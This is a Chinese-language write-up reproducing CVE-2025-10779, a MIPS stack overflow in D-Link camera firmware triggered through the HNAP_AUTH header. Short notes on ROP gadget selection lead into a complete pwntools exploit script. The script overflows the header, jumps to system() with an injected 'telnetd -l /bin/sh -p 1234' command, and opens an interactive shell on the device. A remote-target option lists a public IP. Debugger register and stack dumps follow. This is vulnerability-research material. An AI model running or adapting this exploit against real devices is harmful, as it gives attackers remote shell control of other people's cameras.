Cve 2025 10779 dlink摄像头固件栈溢出复现
CVE-2025-10779 DLink摄像头固件栈溢出复现
DLink摄像头固件栈溢出复现
参考链接
IOT_sec/DCS-935L-1.pdf at main · scanleale/IOT_sec
工控/物联网安全 摄像头0day漏洞挖掘入门第一课_哔哩哔哩_bilibili
FirmAE模拟固件, gdb-multiarch调试
由于mips栈可执行, 通常找jr $sp或者将$sp转到其他寄存器上再跳转ret2shellcode
但是没找到这样的gadget, 只能打ROP
1.mips大端序, strcpy的溢出, 地址中无法写\x00怎么办?
利用strtok的特性构造高位零字节
2.如何进行ROP?
程序中有许多system的调用
注意这个gadget
0x0040c498 : move $a3, $s4 ; lw $gp, 0x20($sp) ; lw $t9, -0x7e04($gp) ; jalr $t9 ; move $a0, $s6
这个gadget以$s6为第一个参数, 调用system函数, 前提是0x20($sp)是正确的gp值。
通过栈溢出我们可以控制$s6
3.如何控制参数?
将执行的命令嵌入到content_body中, 调试发现heap段基址固定不变, 将$s6覆盖为命令字符串所在地址
本地测试成功执行telnetd -l /bin/sh -p 1234并取得shell
from pwn import *
context(arch='mips',endian='big',log_level='debug')
system = 0x0041C560
syscall = 0x004001e0
strcpy = 0x402920
gp = 0x438830
# --- 配置区 ---
local = 1
if local:
target_ip = "192.168.0.1"
target_port = 80
else:
target_ip = "101.100.172.212"
target_port = 3128
heap_base = 0x431000# maybe, 0x4xx000
cmd_addr = heap_base + 0x218
cmd = 'telnetd -l /bin/sh -p 1234;'
# cmd = 'id;'
content_body = ''
content_body += '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><LLL xmlns="http://purenetworks.com/HNAP1/"><Action></Action><Username></Username>'
content_body += '<LoginPassword>' + cmd + '</LoginPassword>'
content_body += '</LLL></soap:Body></soap:Envelope>'
payload_auth = b''
payload_auth += b'aciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaadaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaalfuckkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaa'
payload_auth += b' \x43\x12\x18' # cmd_addr
payload_auth += b'myaamAAa'
# payload_auth += b' ' + b'\x40\xa1\x64' # system(binsh)
payload_auth += b' ' + b'\x40\xc4\x98' # system($s6)
payload_auth += b'a'*0x10
raw_request = b''
raw_request += (
f"POST /HNAP1/ HTTP/1.1\r\n"
f"Host: {target_ip}:{target_port}\r\n"
f'SOAPAction: "http://purenetworks.com/HNAP1/Login"\r\n'
f"Pragma: no-cache\r\n"
f"Cache-Control: no-cache\r\n"
f"Upgrade-Insecure-Requests: 1\r\n"
f"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\r\n"
f"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"
f"Cookie: aaaa\r\n"
).encode()
raw_request += b'HNAP_AUTH: ' + payload_auth + b'\r\n' # 注入点
raw_request += (
f"Accept-Encoding: gzip, deflate\r\n"
f"Accept-Language: zh-CN, zh;q=0.9\r\n"
f"Connection: close\r\n"
f"Content-Length: {len(content_body)}\r\n"
f"\r\n"
f"{content_body}"
).encode()
io = remote(target_ip, target_port)
io.send(raw_request)
print(io.recvall())
io.close()
sleep(5)
p = remote(target_ip, 1234, timeout=5)
p.sendline(b'echo HACK')
if p.recvuntil(b'HACK', timeout=5):
log.success(f"Success\n")
p.interactive()
# 0x0040c498 : move $a3, $s4 ; lw $gp, 0x20($sp) ; lw $t9, -0x7e04($gp) ; jalr $t9 ; move $a0, $s6
# 0x00402a7c in _ftext ()
# LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
# ───────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────
# V0 0x431b48 —▸ 0x4314d8 ◂— 0x4c4c4c00 /* 'LLL' */
# V1 0
# A0 0
# A1 0
# A2 0x77a4267c (__malloc_state+4) —▸ 0x4311c8 —▸ 0x431198 ◂— 0
# A3 1
# T0 0xfffffffe
# T1 0
# T2 1
# T3 0
# T4 0
# T5 0x77a454e0 ◂— 'attr_setdetachstate'
# T6 0
# T7 0x402a3c (_ftext+3580) ◂— b _ftext+3604
# T8 0x71
# T9 0x77a4ecf0 (__pthread_unlock) ◂— lui $gp, 2
# *S0 0x6d726161 ('mraa')
# S1 0x6d736161 ('msaa')
# S2 0x6d746161 ('mtaa')
# S3 0x6d756161 ('muaa')
# S4 0x6d766161 ('mvaa')
# S5 0x6d776161 ('mwaa')
# S6 0x6d786161 ('mxaa')
# S7 0x6d796161 ('myaa')
# S8 0x6d410061
# GP 0x77a68ab0 ◂— 'xmlDocument_setOwnerDocument'
# FP 0x7fab8a68 —▸ 0x7fab8bcc ◂— 'a"http://purenetworks.com/HNAP1/Login"'
# SP 0x7fab8a68 —▸ 0x7fab8bcc ◂— 'a"http://purenetworks.com/HNAP1/Login"'
# RA 0xaabbcc
# *PC 0x402a7c (_ftext+3644) ◂— jr $ra
# ─────────────────────────────[ DISASM / mips / set emulate on ]──────────────────────────────
# 0x402a68 <_ftext+3624> lw $s4, 0x480($sp) S4, [0x7fab8ee8] => 0x6d766161 ('mvaa')
# 0x402a6c <_ftext+3628> lw $s3, 0x47c($sp) S3, [0x7fab8ee4] => 0x6d756161 ('muaa')
# 0x402a70 <_ftext+3632> lw $s2, 0x478($sp) S2, [0x7fab8ee0] => 0x6d746161 ('mtaa')
# 0x402a74 <_ftext+3636> lw $s1, 0x474($sp) S1, [0x7fab8edc] => 0x6d736161 ('msaa')
# 0x402a78 <_ftext+3640> lw $s0, 0x470($sp) S0, [0x7fab8ed8] => 0x6d726161 ('mraa')
# ► 0x402a7c <_ftext+3644> jr $ra <0xaabbcc>
# 0x402a80 <_ftext+3648> addiu $sp, $sp, 0x498
# ↓
# ──────────────────────────────────────────[ STACK ]──────────────────────────────────────────
# 00:0000│ fp sp 0x7fab8a68 —▸ 0x7fab8bcc ◂— 'a"http://purenetworks.com/HNAP1/Login"'
# 01:0004│+004 0x7fab8a6c ◂— 0
# ... ↓ 2 skipped
# 04:0010│+010 0x7fab8a78 ◂— 0x438830
# 05:0014│+014 0x7fab8a7c ◂— 0
# 06:0018│+018 0x7fab8a80 ◂— 'aaaa'
# 07:001c│+01c 0x7fab8a84 ◂— 0
# ────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────
# ► 0 0x402a7c _ftext+3644
# 0x00401c24 : lw $gp, 0x10($sp) ; lw $ra, 0x1c($sp) ; jr $ra ; addiu $sp, $sp, 0x20 控$gp
# 0x00402220 : move $t9, $v0 ; jalr $t9 ; move $a1, $s1 控$a1
# 0x00401d0c <+204>: addu a0,a0,s2
# 0x00401d10 <+208>: lw t9,0(a0)
# 0x00401d14 <+212>: jalr t9
# 0x00401d18 <+216>: sw v0,2740(s0)
# 0x403204 <main+1860>: lw gp,32(sp)
# 0x403208 <main+1864>: lui v0,0x43
# 0x40320c <main+1868>: sw zero,2768(v0)
# 0x403210 <main+1872>: lui v0,0x43
# 0x403214 <main+1876>: lw v0,2772(v0)
# 0x403218 <main+1880>: beqz v0,0x403240 <main+1920>
# 0x40321c <main+1884>: lui v0,0x43
# 0x403220 <main+1888>: lui a0,0x42
# 0x403224 <main+1892>: lw t9,-32260(gp)
# 0x403228 <main+1896>: jalr t9
# 0x40322c <main+1900>: addiu a0,a0,-12172